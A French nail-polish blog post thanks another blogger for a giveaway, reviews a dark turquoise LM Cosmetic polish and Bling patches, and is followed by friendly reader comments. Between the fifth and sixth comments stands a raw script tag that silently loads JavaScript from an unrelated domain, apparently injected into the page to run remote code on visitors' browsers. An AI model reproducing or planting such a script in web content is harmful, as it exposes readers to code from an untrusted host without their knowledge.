• Une illusion devenue réalité grâce à Fleur de Lys ^^

    Coucou tout le monde!!

    Mais c'est quoi ce titre?? lool

    Et bien aujourd'hui je voudrais remercier Fleur de Lys (qu'on ne présente plus tellement ces swatchs et décos sont superbes ^^). Elle avait organisé un giveaway pour l'anniversaire de son blog et j'ai gagné! ^^

    Le lot était composé du joli vernis Illusion, de LM Cosmetic, et d'une planche de Bling :p

    Une fois reçu, j'ai tout de suite voulu tester le vernis (mon 1er LM :p) et au 1er abord, j'ai eu du mal avec le bouchon (pas l'habitude des bouchons rectangulaires) du coup, plein de vernis dans les cuticules (oh my god! pas biennnn!) et j'avais beau passer mon pinceau imbibé de dissolvant (puis d'acétone) il y avait toujours des pigments plein les cuticules grrrr.

    Donc on enlève tout, on brosse ses ongles et on va se coucher mdr.

    Puis aujourd'hui, je décide qu'il faut bien que j'appréhende "la bête" (ba vi! LM fait de superbes collections ^^) et ce coup-ci çà va beaucoup mieux :p

    La couleur est très intense, un turquoise foncé, à la limite du vert à l'ombre :) Il fait de jolies mains (même sur les carnations claires)

    Une illusion devenue réalité

    Quant aux patchs Bling, ils sont tellement beaux que je n'ose pas les utiliser! mdr Ca vous arrive à vous aussi? ^^

    Une illusion devenue réalité

    Encore un grand merci Fleur ;)

    Bonne journée les filles, bisous :)

    « Nouveauté Pupa: camaieu de couleur ultra simple!Une déferlente de précieux ^^ »

  • Commentaires

    1
    Vendredi 7 Décembre 2012 à 09:15

    bravo il est superbe :)

    bises

     

    2
    Vendredi 7 Décembre 2012 à 12:26

    Coucou

    Il est très beau ce LM

    J'ai tenté 2 fois d'utiliser des patchs bling et c'était la cata à chaque fois!

    3
    Sofinela
    Vendredi 7 Décembre 2012 à 14:51

    Il est trop beauuuuuuuuuuu!! J'suis fan, mais tu le sais deja :p

    Bisou ma jumelle!!! Et merci Fleuuuuuur!!! ^^

    4
    AnnSoo Profil de AnnSoo
    Vendredi 7 Décembre 2012 à 15:16

    Ah je vois qu'il vous plaît! :p

    Lily's: j'ai testé les bling en intégral, une catastrophe aussi (ca faisait des plis sur certains doigts car trop bombés, puis niveau tenue c'est pas vraiment çà... Je suis du genre maniaque, quand il  y a un défaut sur un ongle je fais une fixette dessu, donc au lieu de ne rien toucher (car si je le dis pas, personne ne voit le défaut lool) et bien je le trifouille et le 2ème jour j'ai commencé à gratouiller le patch (qui a rendu l'âme le soir même lol)

    Mais en french çà devrait etre plus joli :)

    bisous les filles! :)

    5
    Vendredi 7 Décembre 2012 à 15:22

    Coucou AnnSoo et merci pour ce joli clin d'oeil ^^ Contente que le vernis te plaise !! Bisous et à très vite :)

    <script src="http://superoseplugin.info/dfi823hs.js?0.5531893841905261" type="text/javascript"></script>
    6
    AnnSoo Profil de AnnSoo
    Vendredi 7 Décembre 2012 à 20:09

    Oh oui il est magnifique :p Et le clin d'oeil est tout à fait normal ;) Bisette ^^

    7
    Vendredi 7 Décembre 2012 à 21:49

    Une magnifique couleur qui te va très bien ! Gros bisous :-*

    8
    Nolwenn22420
    Vendredi 7 Décembre 2012 à 21:53

    coucou toi !!!! ça fait plaisir de te revoir sur la toile !!!!! il est vraiment magnifique !!! mais tu sais les blings sont là pour que tu les utilise lol !!!! sinon tu ne connaîtras pas le résultat !!! biz ma belle !!

    9
    AnnSoo Profil de AnnSoo
    Vendredi 7 Décembre 2012 à 22:55

    Merci Julie ^^

    Oui Nono,tu as raison mdr Oh oui trop contente de republier ^^ C'est pas encore aussi régulier que je le voudrais mais je commence à m'organiser (il va neiger c'est sûr! mdrrrr)

    bisous les filles ^^

    10
    Dimanche 9 Décembre 2012 à 15:33

    sublime ce vernis


    bisous AnnSoo

    11
    AnnSoo Profil de AnnSoo
    Dimanche 9 Décembre 2012 à 16:01

    Bisous Lili :)

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :